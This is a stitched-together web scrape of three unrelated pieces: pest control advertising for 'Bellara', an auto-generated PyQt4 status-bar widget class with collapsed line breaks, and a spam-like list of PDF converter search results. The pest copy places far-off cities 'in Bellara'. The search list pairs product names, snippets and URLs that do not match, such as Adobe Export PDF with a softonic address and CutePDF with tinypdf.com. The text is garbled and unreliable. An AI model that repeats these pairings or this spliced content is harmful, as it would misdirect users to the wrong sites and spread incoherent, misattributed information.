a home, it is good to check for pests first. Most importantly, it is essential to get a termite inspection done. And we do it with one simple call! At Fast Pest Bellara, we have a solution for each of the above pests. One of the most common and yet the most dangerous crawling pests found in Bellara homes is the cockroach. They contaminate surfaces and food with the disease-causing organisms that they carry.
Cockroaches are also found in healthcare facilities, restaurants, and other food-related properties. We at Fast Pest Control understand that a rodent infestation in the home can be a dangerous situation. Your health, belongings, and property are at stake. Thus, we offer effective services for rodent control in Bellara. Fast Pest Control also offers pre-purchase pest inspection in Bellara at the most affordable prices. A pre-purchase pest inspection is the right way to make sure you are going to invest in the right property. This is one of the most important aspects to consider while purchasing a house. Our professional pest controllers are highly trained and experienced and know the best ways to bring you satisfactory results. When you hire us for pest inspection services, we come fully prepared, and if we find a pest infestation during the inspection, we can also treat it on your demand. So, do not go buying any property without a complete investigation and inspection. Our huge range of pest control Bellara services also includes restaurant pest control. Being a restaurant owner, your customers’ health must be your top priority. Also, having regular pest control at your restaurant saves you from humiliation: if any of your happy customers spot a pest wandering around the premises, it can lead to a loss in your business as well as your reputation. Neither will those customers return, nor will they recommend your restaurant as a good place to eat. So, what are you still waiting for? Pick up your phone and call us for your pest control needs in Bellara. The professional team of our pest controllers is highly proactive and offers an array of pest control services in Bellara across all the suburbs, including all the metro and remote areas. We reach your place at the best time given by you. You only have to let us know the type of pest and the density of the pest infestation in the house, and we will come to your place with all the preparations.
A few of the many service areas in Bellara include Caboolture, Blantyre, Toorbul, Milora, Ipswich, Toowoomba, Gold Coast, Caloundra, Sandgate, North Lakes, Sunshine Coast, Bellbird Park, Wellington Point, Northgate, Lamington and hundreds of other areas. Why let pests spoil your life when you can easily get rid of them by hiring the pest eradication experts? Call Fast Pest Control Bellara today and say bye to pests from your homes and offices forever. How You Attract Pests Into Your Home? Home Remedies For Flea Control. What all pest control services do you offer?
# -*- coding: utf-8 -*- # Form implementation generated from reading ui file './client/widgets/status_bar.ui' # # Created: Thu Sep 17 23:50:20 2015 # by: PyQt4 UI code generator 4.9.1 # # WARNING! All changes made in this file will be lost! from PyQt4 import QtCore, QtGui try: _fromUtf8 = QtCore.QString.fromUtf8 except AttributeError: _fromUtf8 = lambda s: s class Ui_statusWidget(object): def setupUi(self, statusWidget): statusWidget.setObjectName(_fromUtf8("statusWidget")) statusWidget.resize(625, 39) self.horizontalLayout = QtGui.QHBoxLayout(statusWidget) self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout")) self.label_status = QtGui.QLabel(statusWidget) self.label_status.setMinimumSize(QtCore.QSize(441, 16)) self.label_status.setText(_fromUtf8("")) self.label_status.setObjectName(_fromUtf8("label_status")) self.horizontalLayout.addWidget(self.label_status) self.line = QtGui.QFrame(statusWidget) self.line.setFrameShape(QtGui.QFrame.VLine) self.line.setFrameShadow(QtGui.QFrame.Sunken) self.line.setObjectName(_fromUtf8("line")) self.horizontalLayout.addWidget(self.line) self.label_record = QtGui.QLabel(statusWidget) self.label_record.setMinimumSize(QtCore.QSize(151, 21)) self.label_record.setMaximumSize(QtCore.QSize(151, 16777215)) self.label_record.setText(_fromUtf8("")) self.label_record.setObjectName(_fromUtf8("label_record")) self.horizontalLayout.addWidget(self.label_record) self.retranslateUi(statusWidget) QtCore.QMetaObject.connectSlotsByName(statusWidget) def retranslateUi(self, statusWidget): statusWidget.setWindowTitle(QtGui.QApplication.translate("statusWidget", "Form", None, QtGui.QApplication.UnicodeUTF8))
PDF Converter - Convert PDF to Word, Excel | Able2Extract™ www.investintech.com/ Convert PDF to Word, Excel, PowerPoint and other editable formats. Quickly on the spot. FREE download! Building Trusted PDF Solutions for 15 Years. Free PDF to Word Free Download for Windows 10, 7, 8/8.1 (64 bit/32 fm-pdf.com/ Free PDF to Word is a product developed by Free PDF Solutions. This site is not directly affiliated with Free PDF Solutions. All trademarks, registered trademarks . Export PDF to Word or Excel online | Adobe Export PDF free-print-to-pdf.en.softonic.com/ Adobe Export PDF makes it easy to convert PDFs to Microsoft Word or Excel for editing. Get the complete PDF solution for working anywhere. US$ 14 . 99 /mo. PDF-related Freeware - Whirlpool www.gotomaxx.com/pdfmailer/207/pdfmailer-free?c=1193 Free software to convert pdf files to Word format: Windows With a PDF file size optimisation, Elfima Notepad is the most efficient solution to create quickly and . PDF to Word Converter - 100% Free - PDF Online portableapps.com/node/20402 Best, online Free PDF to Word Converter. I can't speak for anyone else nor their needs, but PDF to Word Online did exactly what I thought Custom Solutions. PDFtoX Software - Free PDF Converter - Free PDF to Word www.soliddocuments.com/ Our free PDF converter software enables you to convert PDF to Word Excel HTML All-in-one PDF solutions that converts PDF files to editable Microsoft Word, . PDF to Word Pro | Convert PDF to Word online free OCR https://www.linkedin.com//20141016073919-153194857-online-free-pdf-to-word-converter-convert-pdf-to-word-for-free Convert PDF to Word online. OCR character 100% free. "Full conversion" will try to make an exact copy of the PDF. Solution: Use the OCR method!. Download 2007 Microsoft Office Add-in: Microsoft Save as PDF or www.bluefoxpdf.com/ May 17, 2016 This download allows you to export and save to the PDF and XPS formats in eight 2007 2007 Microsoft Office Add-in: Microsoft Save as PDF or XPS . 
2007; Microsoft Office Publisher 2007; Microsoft Office Visio 2007; Microsoft Office Word 2007 Get the free email app for iOS, Android, and Windows. Free Print to PDF - Download ccm.net/download/download-572-free-pdf-to-word-converter Free Print to PDF latest version: PDF Printer produces prints from an Size: 8.6 MB; Developer: Free PDF Solutions more programs (17) . The program works to print a wide range of documents into PDF, namely Word, Excel, WordPad, . Free PDF to Powerpoint Converter - Download filehippo.com/software/office/pdf/2/ Free PDF to Powerpoint Converter latest version: Creating powerpoint presentation easily downloads: 1,943; Size: 10.9 MB; Developer: Free PDF Solutions more programs (17) Free Word to PDF Converter � Free PDF to Excel Converter. PDF to Word Converter for Mac - PDF to PowerPoint converter c4lpt.co.uk/directory-of-learning-performance-tools/pdf-tools/ PDF to Word Converter for Mac offers a perfect solution for Mac users to convert their PDF files to an editable MS Word. CutePDF - Convert to PDF for free, Free PDF Utilities, Save PDF www.tinypdf.com/ CutePDF allows you to create PDF files from any printable document, save FREE software for personal, commercial, gov or edu use. PDF Form Solutions. PDF Converter https://www.freepdfconvert.com/developers-api I could get by in "free" mode, and live forever with the unobtrusive sponsor page, workbooks, combining Excel and Word in the same file and many other uses. I am AMAZED that 24-hours after we started looking for PDF solutions we have . How to Convert PDF to Word on Mac: The Always Up-to-Date Guide https://www.iskysoft.com/pdf/ Aug 18, 2016 Here we will provide several solutions to convert PDF to word on Mac. Download the free trial of Cisdem PDF to Word Converter Now!. Software by Free PDF Solutions: Softonic www.pdfonline.com/pdf-to-word-converter/ List of software by Free PDF Solutions. Download Free Word to PDF Converter 2.50. 
License Convert Microsoft Word documents to Adobe PDF file format. 0. Top 5 PDF to MS Word Converters Download Available for Free https://www.recosoft.com/trial-software/ May 19, 2016 Top 5 PDF to MS Word Converters Download Available for Free is developed by BCL Technologies, known for their PDF solutions in the form . PDF | iSkysoft www.lifehack.org/articles//converting-pdf-to-word-files.html There are plenty of PDF solutions for you. Top 10 Tools to Free Transfer Word to PDF Online. If you are Top 10 Ways to Change Word to PDF Online for Free. Free PDF to Word Converter version 1.0.0 by Free PDF Solutions www.freepdfcreator.org/ Jun 18, 2016 The program is usually found in the C:Program Files (x86)Free PDF Solutions Free PDF to Word Converter directory. Take into account that . PDFill PDF Editor - Download www.fromdoctopdf.com/ PDFill PDF Editor, free and safe download. PDFill PDF Editor latest version: A complete solution for PDF editing. PDFill PDF Editor lets you read, edit and modify . FromDocToPDF https://answers.yahoo.com/question/index?qid You can use this PDF to Word FREE download to seamlessly convert PDFs to Word. This PDF convert download is the perfect solution for quickly ironing out . BlueFoxPDF Software - Total Solution of PDF Conversion - Convert https://docupub.com/ BlueFoxPDF provides many PDF converters to convert PDF to Word, Excel, HTML, BlueFox Free PDF to JPG Converter - Convert PDF to JPG, PNG, BMP and . Converting PDF to Word: Best 20 PDF Editor for PC, Mac and Mobile https://discussions.apple.com/thread/3993768?tstart=0 Sep 18, 2016 Nitro Pro PDF Editor [Desktop, Cloud]; Their Online free PDF to word converter Some of the striking features of able2extract 10 PDF solution . Free Business Plan Templates - PDF and Word - BusinessNewsDaily www.pdfforge.org/pdfarchitect Apr 5, 2016 Here's a list of free business plan templates you can create online or Find. A Solution . Score's free PDF and Word business plan templates.